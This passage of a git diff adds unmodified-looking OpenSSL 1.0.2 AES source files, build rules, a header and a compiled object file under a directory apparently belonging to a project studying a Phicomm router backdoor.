+	$(PERL) asm/bsaes-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-x86_64.s: asm/aesni-x86_64.pl
+	$(PERL) asm/aesni-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-sha1-x86_64.s:	asm/aesni-sha1-x86_64.pl
+	$(PERL) asm/aesni-sha1-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-sha256-x86_64.s:	asm/aesni-sha256-x86_64.pl
+	$(PERL) asm/aesni-sha256-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-mb-x86_64.s:	asm/aesni-mb-x86_64.pl
+	$(PERL) asm/aesni-mb-x86_64.pl $(PERLASM_SCHEME) > $@
+
+aes-sparcv9.s: asm/aes-sparcv9.pl
+	$(PERL) asm/aes-sparcv9.pl $(CFLAGS) > $@
+aest4-sparcv9.s: asm/aest4-sparcv9.pl
+	$(PERL) asm/aest4-sparcv9.pl $(CFLAGS) > $@
+
+aes-ppc.s:	asm/aes-ppc.pl
+	$(PERL) asm/aes-ppc.pl $(PERLASM_SCHEME) $@
+vpaes-ppc.s:	asm/vpaes-ppc.pl
+	$(PERL) asm/vpaes-ppc.pl $(PERLASM_SCHEME) $@
+aesp8-ppc.s:	asm/aesp8-ppc.pl
+	$(PERL) asm/aesp8-ppc.pl $(PERLASM_SCHEME) $@
+
+aes-parisc.s:	asm/aes-parisc.pl
+	$(PERL) asm/aes-parisc.pl $(PERLASM_SCHEME) $@
+
+aes-mips.S:	asm/aes-mips.pl
+	$(PERL) asm/aes-mips.pl $(PERLASM_SCHEME) $@
+
+aesv8-armx.S:	asm/aesv8-armx.pl
+	$(PERL) asm/aesv8-armx.pl $(PERLASM_SCHEME) $@
+aesv8-armx.o:	aesv8-armx.S
+
+# GNU make "catch all"
+aes-%.S:	asm/aes-%.pl;	$(PERL) $< $(PERLASM_SCHEME) > $@
+aes-armv4.o:	aes-armv4.S
+bsaes-%.S:	asm/bsaes-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+bsaes-armv7.o:	bsaes-armv7.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl "AES_ENC=$(AES_ENC)" Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+aes_cbc.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_cbc.o: ../../include/openssl/opensslconf.h aes_cbc.c
+aes_cfb.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_cfb.o: ../../include/openssl/opensslconf.h aes_cfb.c
+aes_core.o: ../../include/openssl/aes.h ../../include/openssl/e_os2.h
+aes_core.o: ../../include/openssl/opensslconf.h aes_core.c aes_locl.h
+aes_ctr.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_ctr.o: ../../include/openssl/opensslconf.h aes_ctr.c
+aes_ecb.o: ../../include/openssl/aes.h ../../include/openssl/e_os2.h
+aes_ecb.o: ../../include/openssl/opensslconf.h aes_ecb.c aes_locl.h
+aes_ige.o: ../../e_os.h ../../include/openssl/aes.h ../../include/openssl/bio.h
+aes_ige.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+aes_ige.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+aes_ige.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+aes_ige.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+aes_ige.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+aes_ige.o: ../../include/openssl/symhacks.h ../cryptlib.h aes_ige.c aes_locl.h
+aes_misc.o: ../../include/openssl/aes.h ../../include/openssl/crypto.h
+aes_misc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+aes_misc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+aes_misc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+aes_misc.o: ../../include/openssl/symhacks.h aes_locl.h aes_misc.c
+aes_ofb.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_ofb.o: ../../include/openssl/opensslconf.h aes_ofb.c
+aes_wrap.o: ../../e_os.h ../../include/openssl/aes.h
+aes_wrap.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+aes_wrap.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+aes_wrap.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+aes_wrap.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+aes_wrap.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+aes_wrap.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+aes_wrap.o: ../../include/openssl/symhacks.h ../cryptlib.h aes_wrap.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile.save
new file mode 100644
index 0000000..709b1af
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile.save
@@ -0,0 +1,169 @@
+#
+# crypto/aes/Makefile
+#
+
+DIR=	aes
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+AES_ENC=aes_core.o aes_cbc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+#TEST=aestest.c
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=aes_core.c aes_misc.c aes_ecb.c aes_cbc.c aes_cfb.c aes_ofb.c \
+       aes_ctr.c aes_ige.c aes_wrap.c
+LIBOBJ=aes_misc.o aes_ecb.o aes_cfb.o aes_ofb.o aes_ctr.o aes_ige.o aes_wrap.o \
+       $(AES_ENC)
+
+SRC= $(LIBSRC)
+
+EXHEADER= aes.h
+HEADER= aes_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+aes-ia64.s: asm/aes-ia64.S
+	$(CC) $(CFLAGS) -E asm/aes-ia64.S > $@
+
+aes-586.s:	asm/aes-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/aes-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+vpaes-x86.s:	asm/vpaes-x86.pl ../perlasm/x86asm.pl
+	$(PERL) asm/vpaes-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+aesni-x86.s:	asm/aesni-x86.pl ../perlasm/x86asm.pl
+	$(PERL) asm/aesni-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+aes-x86_64.s: asm/aes-x86_64.pl
+	$(PERL) asm/aes-x86_64.pl $(PERLASM_SCHEME) > $@
+vpaes-x86_64.s:	asm/vpaes-x86_64.pl
+	$(PERL) asm/vpaes-x86_64.pl $(PERLASM_SCHEME) > $@
+bsaes-x86_64.s:	asm/bsaes-x86_64.pl
+	$(PERL) asm/bsaes-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-x86_64.s: asm/aesni-x86_64.pl
+	$(PERL) asm/aesni-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-sha1-x86_64.s:	asm/aesni-sha1-x86_64.pl
+	$(PERL) asm/aesni-sha1-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-sha256-x86_64.s:	asm/aesni-sha256-x86_64.pl
+	$(PERL) asm/aesni-sha256-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-mb-x86_64.s:	asm/aesni-mb-x86_64.pl
+	$(PERL) asm/aesni-mb-x86_64.pl $(PERLASM_SCHEME) > $@
+
+aes-sparcv9.s: asm/aes-sparcv9.pl
+	$(PERL) asm/aes-sparcv9.pl $(CFLAGS) > $@
+aest4-sparcv9.s: asm/aest4-sparcv9.pl
+	$(PERL) asm/aest4-sparcv9.pl $(CFLAGS) > $@
+
+aes-ppc.s:	asm/aes-ppc.pl
+	$(PERL) asm/aes-ppc.pl $(PERLASM_SCHEME) $@
+vpaes-ppc.s:	asm/vpaes-ppc.pl
+	$(PERL) asm/vpaes-ppc.pl $(PERLASM_SCHEME) $@
+aesp8-ppc.s:	asm/aesp8-ppc.pl
+	$(PERL) asm/aesp8-ppc.pl $(PERLASM_SCHEME) $@
+
+aes-parisc.s:	asm/aes-parisc.pl
+	$(PERL) asm/aes-parisc.pl $(PERLASM_SCHEME) $@
+
+aes-mips.S:	asm/aes-mips.pl
+	$(PERL) asm/aes-mips.pl $(PERLASM_SCHEME) $@
+
+aesv8-armx.S:	asm/aesv8-armx.pl
+	$(PERL) asm/aesv8-armx.pl $(PERLASM_SCHEME) $@
+aesv8-armx.o:	aesv8-armx.S
+
+# GNU make "catch all"
+aes-%.S:	asm/aes-%.pl;	$(PERL) $< $(PERLASM_SCHEME) > $@
+aes-armv4.o:	aes-armv4.S
+bsaes-%.S:	asm/bsaes-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+bsaes-armv7.o:	bsaes-armv7.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl "AES_ENC=$(AES_ENC)" Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+aes_cbc.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_cbc.o: ../../include/openssl/opensslconf.h aes_cbc.c
+aes_cfb.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_cfb.o: ../../include/openssl/opensslconf.h aes_cfb.c
+aes_core.o: ../../include/openssl/aes.h ../../include/openssl/e_os2.h
+aes_core.o: ../../include/openssl/opensslconf.h aes_core.c aes_locl.h
+aes_ctr.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_ctr.o: ../../include/openssl/opensslconf.h aes_ctr.c
+aes_ecb.o: ../../include/openssl/aes.h ../../include/openssl/e_os2.h
+aes_ecb.o: ../../include/openssl/opensslconf.h aes_ecb.c aes_locl.h
+aes_ige.o: ../../e_os.h ../../include/openssl/aes.h ../../include/openssl/bio.h
+aes_ige.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+aes_ige.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+aes_ige.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+aes_ige.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+aes_ige.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+aes_ige.o: ../../include/openssl/symhacks.h ../cryptlib.h aes_ige.c aes_locl.h
+aes_misc.o: ../../include/openssl/aes.h ../../include/openssl/crypto.h
+aes_misc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+aes_misc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+aes_misc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+aes_misc.o: ../../include/openssl/symhacks.h aes_locl.h aes_misc.c
+aes_ofb.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_ofb.o: ../../include/openssl/opensslconf.h aes_ofb.c
+aes_wrap.o: ../../e_os.h ../../include/openssl/aes.h
+aes_wrap.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+aes_wrap.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+aes_wrap.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+aes_wrap.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+aes_wrap.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+aes_wrap.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+aes_wrap.o: ../../include/openssl/symhacks.h ../cryptlib.h aes_wrap.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/README
new file mode 100644
index 0000000..0f9620a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/README
@@ -0,0 +1,3 @@
+This is an OpenSSL-compatible version of AES (also called Rijndael).
+aes_core.c is basically the same as rijndael-alg-fst.c but with an
+API that looks like the rest of the OpenSSL symmetric cipher suite.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes.h
new file mode 100644
index 0000000..87bf60f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes.h
@@ -0,0 +1,149 @@
+/* crypto/aes/aes.h -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#ifndef HEADER_AES_H
+# define HEADER_AES_H
+
+# include <openssl/opensslconf.h>
+
+# ifdef OPENSSL_NO_AES
+#  error AES is disabled.
+# endif
+
+# include <stddef.h>
+
+# define AES_ENCRYPT     1
+# define AES_DECRYPT     0
+
+/*
+ * Because array size can't be a const in C, the following two are macros.
+ * Both sizes are in bytes.
+ */
+# define AES_MAXNR 14
+# define AES_BLOCK_SIZE 16
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* This should be a hidden type, but EVP requires that the size be known */
+struct aes_key_st {
+# ifdef AES_LONG
+    unsigned long rd_key[4 * (AES_MAXNR + 1)];
+# else
+    unsigned int rd_key[4 * (AES_MAXNR + 1)];
+# endif
+    int rounds;
+};
+typedef struct aes_key_st AES_KEY;
+
+const char *AES_options(void);
+
+int AES_set_encrypt_key(const unsigned char *userKey, const int bits,
+                        AES_KEY *key);
+int AES_set_decrypt_key(const unsigned char *userKey, const int bits,
+                        AES_KEY *key);
+
+int private_AES_set_encrypt_key(const unsigned char *userKey, const int bits,
+                                AES_KEY *key);
+int private_AES_set_decrypt_key(const unsigned char *userKey, const int bits,
+                                AES_KEY *key);
+
+void AES_encrypt(const unsigned char *in, unsigned char *out,
+                 const AES_KEY *key);
+void AES_decrypt(const unsigned char *in, unsigned char *out,
+                 const AES_KEY *key);
+
+void AES_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                     const AES_KEY *key, const int enc);
+void AES_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                     size_t length, const AES_KEY *key,
+                     unsigned char *ivec, const int enc);
+void AES_cfb128_encrypt(const unsigned char *in, unsigned char *out,
+                        size_t length, const AES_KEY *key,
+                        unsigned char *ivec, int *num, const int enc);
+void AES_cfb1_encrypt(const unsigned char *in, unsigned char *out,
+                      size_t length, const AES_KEY *key,
+                      unsigned char *ivec, int *num, const int enc);
+void AES_cfb8_encrypt(const unsigned char *in, unsigned char *out,
+                      size_t length, const AES_KEY *key,
+                      unsigned char *ivec, int *num, const int enc);
+void AES_ofb128_encrypt(const unsigned char *in, unsigned char *out,
+                        size_t length, const AES_KEY *key,
+                        unsigned char *ivec, int *num);
+void AES_ctr128_encrypt(const unsigned char *in, unsigned char *out,
+                        size_t length, const AES_KEY *key,
+                        unsigned char ivec[AES_BLOCK_SIZE],
+                        unsigned char ecount_buf[AES_BLOCK_SIZE],
+                        unsigned int *num);
+/* NB: the IV is _two_ blocks long */
+void AES_ige_encrypt(const unsigned char *in, unsigned char *out,
+                     size_t length, const AES_KEY *key,
+                     unsigned char *ivec, const int enc);
+/* NB: the IV is _four_ blocks long */
+void AES_bi_ige_encrypt(const unsigned char *in, unsigned char *out,
+                        size_t length, const AES_KEY *key,
+                        const AES_KEY *key2, const unsigned char *ivec,
+                        const int enc);
+
+int AES_wrap_key(AES_KEY *key, const unsigned char *iv,
+                 unsigned char *out,
+                 const unsigned char *in, unsigned int inlen);
+int AES_unwrap_key(AES_KEY *key, const unsigned char *iv,
+                   unsigned char *out,
+                   const unsigned char *in, unsigned int inlen);
+
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif                          /* !HEADER_AES_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cbc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cbc.c
new file mode 100644
index 0000000..e39231f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cbc.c
@@ -0,0 +1,66 @@
+/* crypto/aes/aes_cbc.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/aes.h>
+#include <openssl/modes.h>
+
+void AES_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                     size_t len, const AES_KEY *key,
+                     unsigned char *ivec, const int enc)
+{
+
+    if (enc)
+        CRYPTO_cbc128_encrypt(in, out, len, key, ivec,
+                              (block128_f) AES_encrypt);
+    else
+        CRYPTO_cbc128_decrypt(in, out, len, key, ivec,
+                              (block128_f) AES_decrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cbc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cbc.o
new file mode 100644
index 0000000000000000000000000000000000000000..9d3d506e02635bd733a14ccfbe8531718bdc70ac
GIT binary patch
literal 1768
zcmbu8OK;Oa5XZ+&p#@SXhyzjqnG538RZ@^Bl|V_OBnU+WHR+)TWNg<EiRK~4ks1zg
z;sl3&432z+UilVWIU;Tdsm$N@q?^Uz03(fO=I5P#%+9{6HfnR0MIshGqT@&?(Wl(8
zUy9ulEm59+oV)t7`u<ClZ+ut+{)Uh4Q@v8zuy1U8qh2(!AE>*kuv)x7io@dDwSp?#
zyP05Q(md-j>j~ES(`}j~Is}vDFR~A@-fWSzzih4K7ZwkA!{C?WKSbA3`!|C#&eQj!
ztTDOF3SbYii|MRfyz6O(C`Tv%gfU;3!53$6RAXAsaCkx6r<{3(IqGLhkwF%JID@xl
zaAyW5HyAp;=PRGe)fPM_==tGz5Rp@FG&jo)r&+7Ds%@uT-fUEzc$AE&Z0$U2H<46a
zTc6}%p4}jsV|s*8-b<bpa*Gu;`E``YB|sK%G^X(LfGp@K<O;t6$O3+rRk+PQg!?eo
zIKW2@$KA;F*hXPuJK}}Go~xo@KO(j3MlLCDI3(rwyWOD2tk;hM#l5{cj9mY98o%m|
z)FA8+f-oABif0Hq&dbp429qWK$FVsXJ#Thoi5W!tCyA1=;=`h^P@58~E{7-#%ZvC+
zbeb*JkxrI-xSn$J1-WUSX)uQ_cR0YD|C*2f$D9RLU1a^+I%Hqg7rUV`edtF$(0s`g
z^n@L}`m|hv=^*v&2}vBOpJ0z2%xUI-P6wFhGV`DFxUBoL(}K!9;r@^-`NFf-#?oK$
oVd<m?#v44vYUYEPcgKhxrw1A#(8R1C-fdR?dJ6ZnT)1ZbZ>uMjtN;K2

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cfb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cfb.c
new file mode 100644
index 0000000..1c79ce2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_cfb.c
@@ -0,0 +1,85 @@
+/* crypto/aes/aes_cfb.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2002-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/aes.h>
+#include <openssl/modes.h>
+
+/*
+ * The input and output encrypted as though 128bit cfb mode is being used.
+ * The extra state information to record how much of the 128bit block we have
+ * used is contained in *num;
+ */
+
+void AES_cfb128_encrypt(const unsigned char *in, unsigned char *out,
+                        size_t length, const AES_KEY *key,
+                        unsigned char *ivec, int *num, const int enc)
+{
+
+    CRYPTO_cfb128_encrypt(in, out, length, key, ivec, num, enc,
+                          (block128_f) AES_encrypt);
+}
+
+/* N.B. This expects the input to be packed, MS bit first */
+void AES_cfb1_encrypt(const unsigned char *in, unsigned char *out,
+                      size_t length, const AES_KEY *key,
+                      unsigned char *ivec, int *num, const int enc)
+{
